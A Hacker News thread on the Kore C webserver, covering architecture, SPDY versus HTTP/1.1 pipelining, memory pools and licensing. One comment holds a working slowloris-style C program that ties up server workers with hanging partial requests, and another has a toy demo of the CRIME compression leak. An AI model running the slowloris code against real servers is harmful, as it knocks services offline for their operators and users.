
KORE – A fast SPDY-capable webserver for web development in C - dhotson
https://kore.io/
======
a-priori
Okay, here's a peeve of mine: just because something is written in C ("no overhead!")
doesn't mean it's faster than something in another language in all situations.

As an example, this server uses a thread pool architecture. That architecture
performs poorly with slow clients (common on the public Internet) and with
servers that have to interact with slow disks or external services, and it's
useless for long-polling. It's only useful for CPU-bound applications where you
can assume fast clients and short requests.

In fact, I could make this server grind to a halt by opening one connection
per worker, issuing a partial request on each, then letting the connections
hang. So to be used in production, this server will have to sit behind
something like nginx, which can insulate your application from pathologically
slow clients.
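
To make the failure mode concrete, here's a minimal sketch of that attack. It assumes eight workers and a placeholder host/port; each connection sends an incomplete request, so a blocking worker sits in read() forever waiting for the rest:

```c
/* Sketch: ties up one blocking worker per connection by sending a
 * partial request and then going idle. Host, port, and worker count
 * are placeholders/assumptions, not taken from Kore. */
#include <netdb.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    struct addrinfo hints = {0}, *res;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo("target.example", "8888", &hints, &res) != 0)
        return 1;

    for (int i = 0; i < 8; i++) {   /* one connection per assumed worker */
        int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
        if (fd < 0 || connect(fd, res->ai_addr, res->ai_addrlen) < 0)
            return 1;
        /* Partial request: no terminating blank line, so a blocking
         * worker stalls in read() waiting for the rest of the headers. */
        const char *partial = "GET / HTTP/1.1\r\nHost: target.example\r\n";
        write(fd, partial, strlen(partial));
        /* Deliberately leave fd open and never finish the request. */
    }
    freeaddrinfo(res);
    pause();   /* hold every connection open indefinitely */
    return 0;
}
```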

~~~
mpweiher
> this server uses a thread pool architecture.

Is the README wrong? It says:

"Event driven architecture and worker processes for throughput"

To me this indicates using events for the external interface (slow clients),
and worker processes for taking advantage of multiple cores.

~~~
lasercalm
It looks like the README is accurate. A number of child processes are forked
off, and event processing is then done with kqueue on the BSDs and epoll on
Linux.
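
For readers unfamiliar with the pattern, here's a minimal sketch of pre-forked workers sharing one listening socket, each running its own epoll loop. This is illustrative only (Linux-specific, error handling elided), not Kore's actual code:

```c
/* Sketch of the pre-fork + event-loop pattern described above
 * (Linux/epoll; Kore uses kqueue on the BSDs). Not Kore's code. */
#include <netinet/in.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <unistd.h>

#define WORKERS 4

static void worker_loop(int lfd) {
    int ep = epoll_create1(0);
    struct epoll_event ev = { .events = EPOLLIN, .data.fd = lfd };
    epoll_ctl(ep, EPOLL_CTL_ADD, lfd, &ev);

    for (;;) {
        struct epoll_event events[64];
        int n = epoll_wait(ep, events, 64, -1);
        for (int i = 0; i < n; i++) {
            if (events[i].data.fd == lfd) {
                /* New connection: add it to this worker's event loop. */
                int c = accept(lfd, NULL, NULL);
                ev.events = EPOLLIN;
                ev.data.fd = c;
                epoll_ctl(ep, EPOLL_CTL_ADD, c, &ev);
            } else {
                char buf[4096];
                ssize_t r = read(events[i].data.fd, buf, sizeof(buf));
                if (r <= 0) { close(events[i].data.fd); continue; }
                /* parse request, write response, etc. */
            }
        }
    }
}

int main(void) {
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET,
                              .sin_port = htons(8888),
                              .sin_addr.s_addr = htonl(INADDR_ANY) };
    int one = 1;
    setsockopt(lfd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    bind(lfd, (struct sockaddr *)&sa, sizeof(sa));
    listen(lfd, 128);

    /* Parent forks N children; all share the listening socket. */
    for (int i = 0; i < WORKERS; i++)
        if (fork() == 0) worker_loop(lfd);   /* child never returns */
    for (;;) pause();                        /* parent just supervises */
}
```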

------
richo
> Secure by default > SPDY

Choose one: SPDY mandates gzip, and gzip inside SSL/TLS is vulnerable to
leaking repeated plaintext (e.g. cookies) in nearly every implementation.

[http://en.wikipedia.org/wiki/CRIME_(security_exploit)](http://en.wikipedia.org/wiki/CRIME_\(security_exploit\))
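
The leak is easy to demo. Here's a toy sketch using zlib (build with -lz; the "secret" cookie and request are made up, not any real site's traffic): because DEFLATE back-references repeated substrings, an attacker-controlled guess that matches the secret compresses to fewer bytes, and that length difference is visible on the wire even though the payload is encrypted:

```c
/* Toy demo of the CRIME idea: compressed length leaks whether an
 * attacker's guess matches a secret sharing the same compressed
 * stream. Illustrative only; cookie value is invented. */
#include <stdio.h>
#include <zlib.h>

static uLong clen(const char *guess) {
    char buf[256];
    /* Attacker-controlled guess sits in the same stream as the secret
     * header, as in a compressed HTTPS request. */
    int n = snprintf(buf, sizeof(buf),
                     "GET /?q=Cookie: session=%s HTTP/1.1\r\n"
                     "Cookie: session=abc123\r\n", guess);
    Bytef out[512];
    uLongf outlen = sizeof(out);
    compress(out, &outlen, (const Bytef *)buf, (uLong)n);
    return outlen;
}

int main(void) {
    /* A correct first character extends the back-reference, so the
     * matching guess typically compresses a byte shorter. */
    printf("guess 'a': %lu bytes\n", clen("a"));
    printf("guess 'x': %lu bytes\n", clen("x"));
    return 0;
}
```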

~~~
osth
I choose HTTP/1.1 pipelining. Uncompressed headers are useful. Responses come
back ordered (unlike SPDY), with "HTTP/1.1 200 OK" as the record separator.
Been using this for a decade. Can't see the benefit of SPDY.

Anyway, pipelining is only useful where numerous resources come from the
same host. But the way the www has evolved, so much (unneeded) crap gets
served from ad servers and CDNs. Pipelining isn't going to speed that up.

HTTP/1.1 pipelining was never broken. It was usually just turned off (e.g. in
Firefox), while most web servers have their max keep-alive set around 100. In
plain English, what does that mean? It means: "Dear User, you have permission
to download 100 files at a time from
[http://stupidwebsite.com](http://stupidwebsite.com). That is, you can make
one request for 100 files, instead of 100 separate requests, each for a single
file." And what do Firefox and other braindead web browsers do? They make a
separate request for each file. But hey, never mind all those numerous
connections to ad servers to retrieve marketing garbage (i.e. not the content
you are after), let's concentrate on compressing HTTP headers instead.
Brilliant.

It's trivial to use pipelining:

1. Feed your HTTP requests through netcat or some equivalent to retrieve the files and save them to a concatenated file (a C sketch of this follows below).
2. Split the concatenated file into separate files if desired.
3. View in your favorite browser.

No ad server BS.

Now that's "SPEEDY".
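
In case anyone wants to try it, here's a minimal C version of the netcat trick from step 1: one connection, several GETs written back to back, responses read in order. The host and paths are placeholders, and it assumes plain HTTP with keep-alive enabled:

```c
/* Sketch of HTTP/1.1 pipelining: several GETs written up front on one
 * connection, responses read back in order. Host and paths are
 * placeholders; assumes plain HTTP with keep-alive enabled. */
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    struct addrinfo hints = {0}, *res;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo("stupidwebsite.com", "80", &hints, &res) != 0)
        return 1;
    int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd < 0 || connect(fd, res->ai_addr, res->ai_addrlen) < 0)
        return 1;
    freeaddrinfo(res);

    /* All requests go out immediately, back to back. */
    const char *reqs =
        "GET /a.html HTTP/1.1\r\nHost: stupidwebsite.com\r\n\r\n"
        "GET /b.html HTTP/1.1\r\nHost: stupidwebsite.com\r\n\r\n"
        "GET /c.html HTTP/1.1\r\nHost: stupidwebsite.com\r\n"
        "Connection: close\r\n\r\n";
    write(fd, reqs, strlen(reqs));

    /* Responses arrive concatenated, in order; the "HTTP/1.1 200 OK"
     * status lines act as the record separators mentioned above. */
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf))) > 0)
        fwrite(buf, 1, (size_t)n, stdout);
    close(fd);
    return 0;
}
```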

~~~
dcsommer
Pipelining falls short of SPDY in several respects. The biggest problem is
that it suffers from head-of-line blocking: one slow request or response
prevents the others from making progress. For example, a slow dynamically
generated page at the front of the pipeline stalls every static image queued
behind it.

~~~
osth
I trust that in theory this is true, but I've never personally observed it in
practice.

I guess SPDY fans' marketing of this "feature" would be more convincing if I
could see a demonstration.

I just don't see any noticeable delays when using pipelining.

What strikes me as peculiar about the interest in SPDY is that I never saw any
interest in pipelining before SPDY. And I really doubt it was because of
potential head of line blocking or lack of header compression. I think users
just were not clued in about pipelining.

The speed-up between not using pipelining and using it is, IME, enormous: one
connection for 100 files versus 100 connections for 100 files. It is a huge
efficiency gain.

Yet most users have never even heard of HTTP pipelining, or have never tried
it. If they really wanted such a big speed-up, why wouldn't they use
pipelining, or at least try it? Why wouldn't they demand that browsers
implement it and turn it on by default?

Users are being encouraged to jump right into SPDY, a very recent and
relatively untested internal project of one company (e.g. see the CRIME
incident), when most users, if not all, have never previously experimented
with even basic pipelining, which has been around since the 1999 HTTP/1.1 spec
and is supported via keep-alives in almost all web servers.

Noticeable speed gains would be seen if www pages were not so burdened with
links to resources on external hosts. That's what's really slowing things
down, as browsers make dozens of connections just to load a single page with
little content. The speed gains from cutting out all that third-party host
cruft would make any gains from avoiding theoretical head-of-line blocking
during pipelining seem minuscule and hardly worth all the effort.

If you want to see how much pipelining speeds up getting many files from the
same host, you do not need SPDY to do that. Web servers already have the
support you need to do HTTP/1.1 pipelining. (Though on rare occasions site
admins have keep-alives disabled; HN, for example. In effect these admins are
saying, "Sorry, no pipelining for you.")

~~~
akalin
HTTP pipelining is turned off by default in most browsers due to concerns with
buggy proxies and servers (see
[https://bugzilla.mozilla.org/show_bug.cgi?id=264354](https://bugzilla.mozilla.org/show_bug.cgi?id=264354)
). It may work for you and the particular set of servers you visit, but I
suspect browser developers would rather have a browser that by default works
with the widest possible range of configurations.

Unfortunately, it being turned off by default in most browsers means that most
people won't see the benefits from it. Hopefully, the upcoming HTTP/2 standard
will fare better (latest draft: [https://tools.ietf.org/html/draft-unicorn-httpbis-http2-01](https://tools.ietf.org/html/draft-unicorn-httpbis-http2-01)).

Note that HTTP/2 will be based on SPDY (in particular, SPDY/4 with the new
header compressor). Hopefully, when the standard is finalized and we have
multiple strong implementations, that will allay the concerns you seem to have
with SPDY today.

(Disclaimer: I work on SPDY / HTTP/2 for Chromium.)

~~~
osth
Yes, I understand there are buggy servers and proxies... and I use a browser
that has settings to accommodate them. However... I do not know about HTTP
bugs that affect _pipelining_. And... in addition, for pipelining, I do not
use a browser to do the initial retrieval. I use something like netcat to
fetch, and then I view the results with a browser.

Can you give me a list of buggy servers where my HTTP/1.1 pipelining will not
work as desired? I've been doing pipelining for 10 years (that's quite a few
servers I've tried) with no problems.

The arguments made by SPDY fans (e.g. Google employees) all seem plausible.
But I wonder why they are never supported by evidence. IOW, please show me,
don't just tell me. SPDY seems to solve "problems" I'm not having. Where can I
see these HTTP/1.1 pipelining problems (not just problems with browsers like
Firefox or Chrome) in action? I'd love to try some of the buggy servers you
allude to and see if they slow down pipelining with netcat.

~~~
akalin
I didn't have to look hard to find bug reports for pipelining. An example is
[https://bugs.launchpad.net/ubuntu/+source/apt/+bug/948461](https://bugs.launchpad.net/ubuntu/+source/apt/+bug/948461)
for Amazon's S3. I'd be interested if the problem is still reproducible now.
Also, one of the comments mentions Squid 2.0.2 as being buggy.

Also, see [https://insouciant.org/tech/status-of-http-pipelining-in-chr...](https://insouciant.org/tech/status-of-http-pipelining-in-chromium/)
for a link to Firefox's blacklist of buggy servers (and a good discussion of
pipelining in Chromium).

Most of the improvements in SPDY are latency improvements, so if you're
downloading sites with netcat and then viewing them in a browser, I'm pretty
sure the overhead of that would dwarf anything SPDY would save. That having
been said, there's ample evidence of SPDY improving things. From
[http://bitsup.blogspot.com/2012/11/a-brief-note-on-pipelines...](http://bitsup.blogspot.com/2012/11/a-brief-note-on-pipelines-for-firefox.html):

"Also see telemetry for TRANSACTION_WAIT_TIME_HTTP and
TRANSACTON_WAIT_TIME_HTTP_PIPELINES - you'll see that pipelines do marginally
reduce queuing time, but not by a heck of a lot in practice. (~65% of
transactions are sent within 50ms using straight HTTP, ~75% with pipelining
enabled).... Check out TRANSACTON_WAIT_TIME_SPDY and you'll see that 93% of
all transactions wait less than 1ms in the queue!"

~~~
osth
Thanks for the reading material.

You omitted the sentence before your excerpt where Mr. McManus suggests we
move to a multiplexed pipelined protocol for HTTP.

I'll go further. I say we need a lower-level, large-framed, multiplexed
protocol, carried over UDP, that can accommodate HTTP, SMTP, etc. Why restrict
multiplexing to HTTP and "web browsers"? Why are we funnelling everything
through a web browser ("HTTP is the new waist") and looking to the web browser
as the key to all evolution? It seems obvious to me that what we all want is
end-to-end, peer-to-peer connectivity. Although users cannot articulate that,
it's clear they expect to have "stable connections". This end-to-end
connectivity was the original state of the internet, before "firewalls".
Client-server is only so useful. It seems to me we want a "local" copy of the
data sources that we need to access. We want data to be "synced" across
locations. A poor substitute for such "local copies" has been moving data to
network facilities located at the edge, shortening the distance to the user.

But, back to reality: in the case of HTTP servers, common sense tells me that
opening myriad connections to (often busy) web servers to retrieve myriad
resources is more prone to potential delays or other problems (and such delays
could be due to any number of reasons) than opening a single connection to
retrieve said myriad resources. Moreover, aren't his observations in the
context of just one browser?

I guess when you work on a browser development team, you might get a sort of
tunnel vision, where the browser becomes the center of the universe.

If you dream of multiplexing over stable connections, then you should dream
bigger than the web browser. IMO.

I'm aware of a bug in some PHP databases with keep-alive after POST. I mainly
use pipelining for document retrieval (versus document submission), so I am
not a good judge of this. What I'm curious about is where keep-alives after
POST would be desirable. You alluded to that usage scenario (a series of GETs
after a large POST).

~~~
akalin
Re. Patrick's sentence, you're right, but as I mentioned above, SPDY/4 will
become HTTP/2 (we're working through the standardization process). So I think
most of the major players are on board with "fixing" HTTP pipelining by using
SPDY-style multiplexing.

Re. thinking bigger, you might want to read up on QUIC, which was announced
recently:
[http://en.wikipedia.org/wiki/QUIC](http://en.wikipedia.org/wiki/QUIC). Based
on that, I would contend that at least we on the Chromium team don't have
tunnel vision. :)

Re. your question, Patrick's data is from Firefox only, I believe. You're right
that it's not surprising his stats show that SPDY helps over HTTP without
pipelining. But the more interesting thing is that HTTP with pipelining still
doesn't help that much over HTTP without pipelining (on average) and SPDY
still beats it by orders of magnitude. I'd have to dig, but I'm pretty sure
there are similar stats on the Chromium side.

~~~
osth
Yes, a major appeal of pipelining to me is efficiency with respect to open
connections. It's easier to monitor the progress of one connection sending
multiple HTTP verbs than multiple connections each sending one verb.

Whether multiple verbs over one connection are processed by the given httpd
more efficiently than single verbs over single connections is another issue.
IME, a purely client-side perspective, pipelining does speed things up. But
then I'm not using Firefox to do the pipelining.

I'm sure the team responsible for Googlebot would have some insight on this
question. (And I wonder how much SPDY makes the bot's job easier?)

In any event, multiplexing would appear to solve the open connections issue.
And I don't doubt it will consistently beat HTTP/1.1 pipelining alone. I'm a
big fan of multiplexing (for peer-to-peer "connections"), but I am perplexed
as to why it's being applied at the high level of HTTP (and hence restricted
to TCP, with all of its own inefficiencies and limitations).

I'm curious about something you said earlier. You said something about the
"overhead" of using netcat. It's a relatively small, simple program with
modest resource requirements. What did you mean by overhead?

~~~
akalin
Re. multiplexing at the HTTP layer: an HTTP replacement has to be deployable
and testable. However, now that the ideas in SPDY have been proven
and are on their way to being standardized, you can look at QUIC to see what
can be done when not limited to TCP and HTTP.

By overhead I mean latency overhead: running a program to download a site to
a local file and then displaying it in a browser will almost certainly have a
higher time to first render. Not to mention you're hitting everything cold
(i.e., not using the browser's cache).

~~~
osth
I don't measure latency as including rendering time. Maybe I'm not "rendering"
anything except pure html.

I measure HTTP latency as the time it takes to retrieve the resources.

Whatever happens after that is up to the user. Maybe she wants to just read
plain text (think text-only Google cache). Maybe she wants to view images.
Maybe she wants to view video. Maybe she only wants resources from one host.
Maybe she does not want resources from ad servers. We just do not know.
Today's webpages are so often collections of resources from a variety of
hosts. We can't presume that the user will be interested in each and every
resource.

Of course, those doing web development like to make lots of presumptions about
how users will view a webpage. Still, these developers must tolerate that
users' connection speeds vary, their computers vary, and their browsers vary,
and that some routinely violate "standards". Heck, some users might even clear
their browser cache now and again.

But HTTP is not web development. It's just a way to request and submit
resources. Nothing more, and nothing less.

------
alkou
Do you have any benchmarks against nginx?
[http://nginx.org/en/docs/http/ngx_http_spdy_module.html](http://nginx.org/en/docs/http/ngx_http_spdy_module.html)

------
antihero
Would it be an interesting idea to create a framework for making webapps as
nginx modules? Sure, it's a pain in the ass, but nginx is evented as opposed
to thread-pooled, and it's tried and tested. Because nginx takes up hardly any
memory, you could run a single nginx instance and proxy to other nginx
instances compiled purely to run the app.

Though the scope for creating critical vulnerabilities is _huge_.

~~~
eric_bullington
There is such a framework: openresty

[http://openresty.org/](http://openresty.org/)

It uses a wide range of 3rd-party nginx modules, and Lua as a scripting
language, to form a nice little framework. Extraordinarily fast by any
standards.

~~~
fcambus
Lapis is also worth mentioning:
[http://leafo.net/lapis/](http://leafo.net/lapis/)

Lapis is a framework for building web applications using MoonScript (or Lua)
that runs inside of a customized version of Nginx called OpenResty.

~~~
antihero
That looks really interesting, thanks.

------
dschiptsov
I stopped reading at mem.c. Pool-based memory allocation, with cache-locality
awareness and data partitioning by access pattern, is a must for a modern
server. Simply malloc'ing every buffer you need is a naive strategy which will
probably result in memory fragmentation and cache misses.
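
For anyone unfamiliar with the idea, here's a minimal sketch of such a pool: one contiguous slab carved into fixed-size slots threaded onto an intrusive freelist, so alloc/free are O(1) and same-type objects stay packed together. Real server pools add per-size classes, alignment, and growth; this is just the gist, not Kore's mem.c:

```c
/* Minimal fixed-size object pool of the kind argued for above: one
 * up-front allocation, O(1) alloc/free via an intrusive freelist,
 * objects of the same type packed together for cache locality. */
#include <stddef.h>
#include <stdlib.h>

struct pool {
    void   *slab;      /* one contiguous block for all objects */
    void   *free;      /* head of intrusive freelist */
    size_t  objsize;
};

static int pool_init(struct pool *p, size_t objsize, size_t nobj) {
    if (objsize < sizeof(void *)) objsize = sizeof(void *);
    if ((p->slab = malloc(objsize * nobj)) == NULL)
        return -1;
    p->objsize = objsize;
    p->free = NULL;
    /* Thread every slot onto the freelist. */
    for (size_t i = 0; i < nobj; i++) {
        void *obj = (char *)p->slab + i * objsize;
        *(void **)obj = p->free;
        p->free = obj;
    }
    return 0;
}

static void *pool_get(struct pool *p) {
    void *obj = p->free;
    if (obj != NULL)
        p->free = *(void **)obj;   /* pop */
    return obj;                    /* NULL when exhausted */
}

static void pool_put(struct pool *p, void *obj) {
    *(void **)obj = p->free;       /* push */
    p->free = obj;
}

int main(void) {
    struct pool connections;
    pool_init(&connections, 256, 1024);   /* e.g. connection structs */
    void *c = pool_get(&connections);
    pool_put(&connections, c);
    free(connections.slab);
    return 0;
}
```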

Surprisingly accurate and clean C, though. This guy is a good candidate for
hiring (assuming he wishes to be hired).

------
betterunix
Why web development in C? Seems like a headache.

~~~
weland
It's quite a gift for embedded systems. It's very convenient to have a self-
contained solution for a web interface, rather than dragging an interpreter
and a web server onto an already crowded rootfs. Plus, you get the benefit of
static analysis and the like, which is extra useful on such systems.

~~~
drdaeman
I believe there are quite a few languages other than C that compile ahead of
time to native code.

~~~
pi18n
But do they have equal tooling? That's why I'd use C if I were using C for
something; it's "portable assembly".

------
kaoD
It's ironic that the website isn't working. Alternate link? (GitHub perhaps?)

~~~
bobol
[https://github.com/jorisvink/kore](https://github.com/jorisvink/kore)

------
anuragramdasan
Web development in C, I love this.

~~~
ndesaulniers
It's just a server. Many sites sit behind nginx, a web server also written in
C, as a reverse proxy, but that doesn't make them "web development in C."

Edit: This is web development in C:
[https://github.com/jorisvink/kore_website/blob/master/src/si...](https://github.com/jorisvink/kore_website/blob/master/src/site.c)

------
aray
Why the ISC license? The site just says "Kore is licensed under the ISC
license allowing it to be used in both free and commercial products," but
don't Apache 2, BSD, and MIT all satisfy this as well?

IANAL, but here's a quick summary of ISC vs MIT:
[http://www.tldrlegal.com/compare?a=MIT+License&b=ISC+License](http://www.tldrlegal.com/compare?a=MIT+License&b=ISC+License)

~~~
protomyth
OpenBSD went with ISC for new code:
[http://www.openbsd.org/policy.html](http://www.openbsd.org/policy.html)

------
nvartolomei
Take libuv for the win. Worth watching:
[http://vimeo.com/24713213](http://vimeo.com/24713213).

libuv is used in Node.js.

------
running_foo
What are some frameworks for web development in C? Is KORE also a framework,
or just a server?

As for the server, I wonder how its performance compares to, say, OpenResty
loading Lua compiled to bytecode.

------
ams6110
Web development in C. Reminds me of aolserver.

[http://www.aolserver.com/docs/devel/c/](http://www.aolserver.com/docs/devel/c/)

------
X4
Every new HTTP daemon is heartily welcome!

------
bobol
Connection timeout?

Brilliant idea. I especially love the SSL-only design. The web needs to move
to pure SSL.

~~~
davis_m
That is a by-product of being SPDY-compliant. The SPDY spec doesn't allow for
unencrypted traffic, which is just one reason we need to switch over.

